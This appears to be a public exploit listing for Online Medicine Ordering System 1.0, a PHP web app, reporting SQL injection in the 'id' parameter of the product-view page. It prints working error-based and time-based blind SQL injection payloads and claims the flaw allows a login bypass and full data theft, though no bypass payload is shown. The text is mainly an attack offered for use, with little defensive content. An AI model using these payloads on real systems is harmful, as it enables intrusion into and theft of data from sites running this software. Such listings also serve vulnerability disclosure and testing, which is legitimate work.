Exploit for Online Medicine Ordering System 1.0 Authentication Bypass / SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:190108
# Titles: OMOS-1.0-Copyright©2025-Multiple-SQLi
    # Author: nu11secur1ty
    # Date: 03/28/2025
    # Vendor: https://github.com/oretnom23
    # Software:
    https://www.sourcecodester.com/php/15359/online-medicine-ordering-system-phpoop-free-source-code.html
    # Reference: https://portswigger.net/web-security/sql-injection
    
    ## Description:
    The id parameter appears to be vulnerable to SQL injection attacks. A
    single quote was submitted in the id parameter, and a database error
    message was returned. Two single quotes were then submitted and the error
    message disappeared. You should review the contents of the error message,
    and the application's handling of other input, to confirm whether a
    vulnerability is present. The attacker can get all sensitive information
    from this system when he attacks it online, He can login super easily
    WITHOUT PASSWORD - ONLY USER - bypassing, and can crash or get every
    sensitive information from him!
    
    STATUS: HIGH-CRITICAL Vulnerability
    
    
    [+]Exploit:
    - SQLi-Bypass login authentication:
    
    ```SQLi
    ---
    Parameter: id (GET)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
    BY clause (FLOOR)
        Payload: p=products/view_product&id=4' AND (SELECT 5376 FROM(SELECT
    COUNT(*),CONCAT(0x71766a6b71,(SELECT
    (ELT(5376=5376,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# RseW
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: p=products/view_product&id=4' AND (SELECT 6960 FROM
    (SELECT(SLEEP(7)))zPhG)# HsPd
    ---
    ```
    
    # Reproduce:
    [href](https://www.patreon.com/posts/omos-1-0-c-2025-125353759)
    
    
    ## Time spent:
    01:15:00